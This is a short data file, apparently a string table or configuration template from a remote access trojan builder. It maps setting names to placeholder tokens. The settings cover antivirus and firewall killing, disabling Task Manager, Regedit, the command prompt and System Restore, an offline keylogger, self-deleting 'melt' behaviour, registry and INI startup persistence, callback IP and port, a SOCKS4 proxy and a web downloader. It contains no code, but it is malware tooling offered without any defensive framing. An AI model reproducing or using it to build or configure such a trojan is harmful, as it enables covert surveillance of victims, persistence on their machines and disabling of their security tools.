A/V & FireWall Killing<>NULL<>%KI%<>NULL
Clients Connected<>NULL<>%CC%<>NULL
Disable Command Prompt<>NULL<>%DC%<>NULL
Disable Regedit<>NULL<>%DR%<>NULL 
Disable System Restore<>NULL<>%DS%<>NULL
Disable Taskmanger<>NULL<>%DM%<>NULL
Install Url<>NULL<>%IU%<>NULL
Installed<>NULL<>%IN%<>NULL
Melt Server<>NULL<>%ML%<>NULL
Message Error Body<>NULL<>%MB%<>NULL
Message Error Title<>NULL<>%MS%<>NULL
Offline Keylogger<>NULL<>%OK%<>NULL
Port Open Only if Online<>NULL<>%PO%<>NULL
Register Extention<>NULL<>%RE%<>NULL
Server Name<>NULL<>%VN%<>NULL
Server Password<>NULL<>%PW%<>NULL
Server Port<>NULL<>%PT%<>NULL
Server Version<>NULL<>%SV%<>NULL
Server Visible?<>NULL<>%IS%<>NULL
Server Exe Location<>NULL<>%EL%<>NULL
Sin Ip<>NULL<>%SI%<>NULL
Sin Port<>NULL<>%SP%<>NULL
Socks 4 Server<>NULL<>%S4%<>NULL
Start up Registry Run Services<>NULL<>%SR%<>NULL
Start up Registry Run<>NULL<>%RR%<>NULL
Start up System INI<>NULL<>%SI%<>NULL
Start up Win INI<>NULL<>%WI%<>NULL
Web Dloader<>NULL<>%DL%<>NULL